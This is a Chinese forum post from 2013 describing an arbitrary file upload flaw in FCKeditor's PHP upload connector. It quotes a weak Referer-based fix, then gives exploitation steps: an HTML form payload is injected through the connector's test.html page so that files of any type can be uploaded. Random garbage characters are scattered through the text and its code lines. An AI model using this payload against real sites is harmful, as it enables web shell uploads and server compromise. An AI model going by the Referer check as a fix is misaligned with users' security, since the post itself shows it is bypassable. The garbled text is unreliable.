漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
" h* i) A3 a6 X" q7 w网上给出的修复方案是
# u1 C9 S' h3 |- R8 G修复方法,删除FCK编辑器用其他的编辑器1 J, ?; S6 ^( i+ y0 w
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件2 i, W* D1 _# ]4 r0 u; S
在6 E4 y( f9 e/ a6 b, s$ M4 o; b
require(‘config.php’);
- \- I3 z$ |' Krequire(‘util.php’);
7 ~% J5 g1 {! `+ @+ E W的下面添加以下代码—————————–7 r; k, U3 p4 Q9 c5 R
//防止外部提交
/ @8 [, h( I. L* }# Rfunction outsidepost()$ _/ u3 x5 _& z! z& @
{9 s; N- L* f# U P' n, A" P
$servername=$_SERVER['SERVER_NAME'];
6 w4 M* V" ]6 R4 q$sub_from=@$_SERVER['HTTP_REFERER'];
1 z F# ^& ^8 m' N$sub_len=strlen($servername);# g% Q- M* Y( L5 G$ i# T6 B
$checkfrom=substr($sub_from,7,$sub_len);
, ?- _4 @/ y& v# S+ W3 S4 rif($checkfrom!=$servername){
0 g0 [5 x! l4 \8 Q$ f# Xecho(“you don’t outsidepost!”);4 c; E+ H* b# [& A
exit;% Q% Z4 ]* s9 q3 M s- E2 v+ Q
}
0 n. G! }5 T6 D5 y& H( z" P! ~. o}
k. r5 h$ ^" r! x9 F: R3 ioutsidepost();5 C" I5 }3 e6 f6 r: y
防止外部提交,但是没有防止内部提交,* C4 @; o- `) N2 p9 X$ m, W7 @
利用方法:, w$ Y! k; M8 u4 K& p# |
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
4 f9 f( V5 u& b: D5 i. ^* Q2,在Current Folder 框输入$ a; Q: V; `. V! L4 x! _3 |
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>1 m0 ^1 y3 ~% b) }8 {; |" W
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
/ }! |7 z7 @: _' u! d: |5 G1 ]PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对